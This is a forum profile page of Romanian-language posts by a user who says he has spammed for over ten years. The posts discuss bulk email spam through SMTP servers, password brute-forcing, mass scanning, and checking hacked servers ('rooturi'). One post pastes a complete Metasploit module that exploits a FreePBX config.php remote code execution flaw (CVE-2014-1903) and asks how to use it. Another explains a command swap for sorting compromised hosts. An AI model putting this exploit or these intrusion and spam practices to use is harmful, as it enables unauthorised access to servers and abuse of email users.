Jump to content

BloodLust

Members
  • Posts

    26
  • Joined

  • Last visited

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

BloodLust's Achievements

Newbie

Newbie (1/14)

10

Reputation

  1. altu explica ca cu 5 smtp-uri trimiti 1 milion de mailuri si imbox bai baiatule imbox zici .. nu exista smtp de imbox mai bine ai zice ca trebuie sa faci bine subiectul si mesajul pentru a se duce imbox voi invatati pe alti dar nu va uitati la voi ca habar naveti si in primul rand pentru ada 1 milion de mailuri vei nevoie de smtp-uri fara limita .. si nu aveti deunde sa stiti care e limita .. majoritatea hosturilor accepta cam 100+ emailuri trimise pe ora .. sau 250 mailuri trimise .. asta e vb de smtp pe host platit daca prindeti .. nu exista 1 milion de mailuri cu 5 smtp nuti dai seama ce vorbesti .. intradevar acele 5 smtp iti va arata ca se duc emailurile dar dintrun milion iti garantez eu ca mai mult de cateva sute de mii nu se vor duce in email retu numai ajung .. dar iti va arata ca sunt trimise .. nu dau spam de ieri de azi .. dau spam de cel putin 10 ani .. forumul asta nici nu exista cand ma jucam cu chase .. si altele .. poate ca nici multi din voi .. raman uimit cand citesc unele aberatii ..
  2. daca uni recomanda sa nu scanezi ca te toarna politia .. bai fratilor astia cu recomandarile voastre .. cred ca nati auzit de socks-uri si alte kkturi .. lasativa de meserie ..... macar recomandati ceva nu postati critici .. ca nu de critici are omu nevoie .. dar mam convins numai hackeri de 2 bani aici pe forumul asta .. putini profesionisti .. si cui nui convine ce scriu eu .. sa ma scurga ... iar pt incepatori fratilor cautativa un forum ok .. aici dati numai peste profesionisti care lucreaza in python .. altceva nu stiu .. asta e gradinita linuxului .. si a hackerilor romani de 2 lei .. putini de aici au valoare si ii respect .. restu sunt niste inteligent fara sperante .. daca le pun o intrebare o sa mi se raspunda cu o alta dar cei aia ? si tot asa.... am ajutat pe multi ..dar in schimbul ajutorului da cand am cerut ceva spre ajutor .. o arhiva sau eu stiu ce .. mi se cerea bani chiar si pentru arhive publice .. vor si ei sa faca un ban cu prosteli .. ca pe irc .. defapt nu gresesc .. sa mutat irc-ul aici .. ce sa zic basfta hackeri de2 lei .. admini ar tebui sa va dea la .... dar se multumesc cu vizitele voastre ..
  3. am vazut dar ma gandeam lao explicatie mai detaliata am vazut ca se foloseste cu metasploit dar cum ... e prima oara cand pun mana pe asa ceva ... adica metasploit si aceasta vulnerabilitate as dori un tutorial ceva .. am cautat dar nam gasit .. despre asta.. am gasit cu totul altceva ..
  4. am gasit asa ceva dar nu stiu cu ce se mananca mancarea asta de peste ... am posta poate pot primi un ajutor o informatie din partea voastra .. http://www.exploit-db.com/exploits/32512/ ## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, 'Name' => "FreePBX config.php Remote Code Execution", 'Description' => %q{ This module exploits a vulnerability found in FreePBX version 2.9, 2.10, and 2.11. It's possible to inject arbitrary PHP functions and commands in the "/admin/config.php" parameters "function" and "args". }, 'License' => MSF_LICENSE, 'Author' => [ 'i-Hmx', # Vulnerability discovery '0x00string', # PoC 'xistence <xistence[at]0x90.nl>' # Metasploit module ], 'References' => [ ['CVE', '2014-1903'], ['OSVDB', '103240'], ['EDB', '32214'], ['URL', 'http://issues.freepbx.org/browse/FREEPBX-7123'] ], 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Targets' => [ ['FreePBX', {}] ], 'Privileged' => false, 'DisclosureDate' => "Mar 21 2014", 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [true, 'The base path to the FreePBX installation', '/']) ], self.class) register_advanced_options( [ OptString.new('PHPFUNC', [true, 'The PHP execution function to use', 'passthru']) ], self.class) end def check vprint_status("#{peer} - Trying to detect installed version") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, "admin", "CHANGES") }) if res and res.code == 200 and res.body =~ /^(.*)$/ version = $1 else return Exploit::CheckCode::Unknown end vprint_status("#{peer} - Version #{version} detected") if version =~ /2\.(9|10|11)\.0/ return Exploit::CheckCode::Appears else return Exploit::CheckCode::Safe end end def exploit rand_data = rand_text_alpha_lower(rand(10) + 5) print_status("#{peer} - Sending payload") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, "admin", "config.php"), 'vars_get' => { "display" => rand_data, "handler" => "api", "function" => datastore['PHPFUNC'], "args" => payload.encoded } }) # If we don't get a 200 when we request our malicious payload, we suspect # we don't have a shell, either. if res and res.code != 200 print_error("#{peer} - Unexpected response, exploit probably failed!") end end end
  5. si dacaai scannerul si nu e de dat dc mai postezi cal si si in plus de asta si id-ul de mess ? kknari... am cunoscut multi de genu postau sa intru in privat iar in privat in loc sa ajte zicea ca face ei tot dacaii platesc pt serviicile lor .. dar nu inteleg dc nu posteaza asta cerand ani dar ei posteaza pm me ca iti dau eu .. sunt ff multi de genu aici ar trebui curantenie facuta ..
  6. am patit si eu la fel pe unele rooturi .. a mers si la un moment dat na mai mers ... nu stiu care e duma ..
  7. ma intereseaza si pe mine cumsa fac sa ia parole din lista la verificat exactcum face si brutfoce pe linux gen unixcode .. etc .. nu sa le ia pe rand ... dureaza prea mult, se poate face ceva sa nu le mai ia pe rand ?
  8. e bun programu de windows dar ia si multe servere care nu merg ... sau am gresiteu cu ceva cand am pornit scanul ?prinde si bune si care nu merg fata de linux ia multecare nu merg gen dintro subclasa 2 imi merg si 100 mile ia cu userul pus de mn dar nu merg
  9. root:server1 [/var/tmp]# python 1.py File "1.py", line 21 "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 ^ SyntaxError: EOL while scanning single-quoted string ce sai fac cine imi spune si mie ?
  10. eu il am de cativa ani si il am gratuit scannerul asta
  11. am o problema root@localhost:/var/tmp/wp# ./brute bash: ./brute: No such file or directory e singurul fiser care nu imi merge ce sai fac ?
  12. in loc de commanda "uname -a" am pus "cat /etc/issue" pentru a vedea ce a prins deoarece am scanat normal cum e aici si prindea numai routere si verificam degeaa o imensa lista pt cei care vor potpune asa si in lista iti va arata ce versiune este .. sa intrati si sa estati direct rooturile bune .. fara a mai pierde timp cu routere si alte sisteme
  13. salut stii vreun scanner de vpn-uri ? cica ar exista ..

  14. la cumparat careva ?
×
×
  • Create New...